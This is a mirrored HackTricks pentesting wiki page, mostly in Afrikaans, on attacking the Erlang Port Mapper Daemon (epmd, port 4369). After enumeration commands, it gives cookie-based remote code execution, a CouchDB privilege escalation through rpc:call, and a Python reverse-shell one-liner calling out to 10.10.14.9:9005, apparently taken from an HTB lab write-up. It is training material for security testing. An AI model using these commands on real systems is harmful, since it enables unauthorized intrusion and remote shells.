maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md

86 lines
3.3 KiB
Markdown
Raw Blame History

{{#include ../banners/hacktricks-training.md}}
# Basiese Inligting
Die **Erlang Port Mapper Daemon (epmd)** dien as 'n koördineerder vir verspreide Erlang instansies. Dit is verantwoordelik vir die toewysing van simboliese knoopname aan masjienadresse, wat in wese verseker dat elke knoopnaam met 'n spesifieke adres geassosieer word. Hierdie rol van **epmd** is van kardinale belang vir die naatlose interaksie en kommunikasie tussen verskillende Erlang knope oor 'n netwerk.
**Standaard poort**: 4369
```
PORT STATE SERVICE VERSION
4369/tcp open epmd Erlang Port Mapper Daemon
```
Dit word standaard gebruik op RabbitMQ en CouchDB installasies.
# Opname
## Handmatig
```bash
echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369
#Via Erlang, Download package from here: https://www.erlang-solutions.com/resources/download.html
dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb
apt-get install erlang
erl #Once Erlang is installed this will promp an erlang terminal
1> net_adm:names('<HOST>'). #This will return the listen addresses
```
## Outomaties
```bash
nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>
PORT STATE SERVICE VERSION
4369/tcp open epmd Erlang Port Mapper Daemon
| epmd-info:
| epmd_port: 4369
| nodes:
| bigcouch: 11502
| freeswitch: 8031
| ecallmgr: 11501
| kazoo_apps: 11500
|_ kazoo-rabbitmq: 25672
```
# Erlang Cookie RCE
## Remote Connection
As jy die **Authentication cookie** kan **leak**, sal jy in staat wees om kode op die gasheer uit te voer. Gewoonlik is hierdie koekie geleë in `~/.erlang.cookie` en word dit deur erlang gegenereer by die eerste opstart. As dit nie gemodifiseer of handmatig gestel is nie, is dit 'n ewekansige string \[A:Z] met 'n lengte van 20 karakters.
```bash
greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn
Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]
Eshell V8.1 (abort with ^G)
At last, we can start an erlang shell on the remote system.
(test@target.fqdn)1>os:cmd("id").
"uid=0(root) gid=0(root) groups=0(root)\n"
```
Meer inligting in [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)\
Die outeur deel ook 'n program om die koekie te bruteforce:
{{#file}}
epmd_bf-0.1.tar.bz2
{{#endfile}}
## Plaaslike Verbinding
In hierdie geval gaan ons CouchDB misbruik om plaaslike regte te verhoog:
```bash
HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE
(anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).
"homer\n"
(anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).
```
Example geneem van [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)\
Jy kan **Canape HTB masjien gebruik om** **te oefen** hoe om **hierdie kwesbaarheid te benut**.
## Metasploit
```bash
#Metasploit can also exploit this if you know the cookie
msf5> use exploit/multi/misc/erlang_cookie_rce
```
# Shodan
- `port:4369 "by poort"`
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink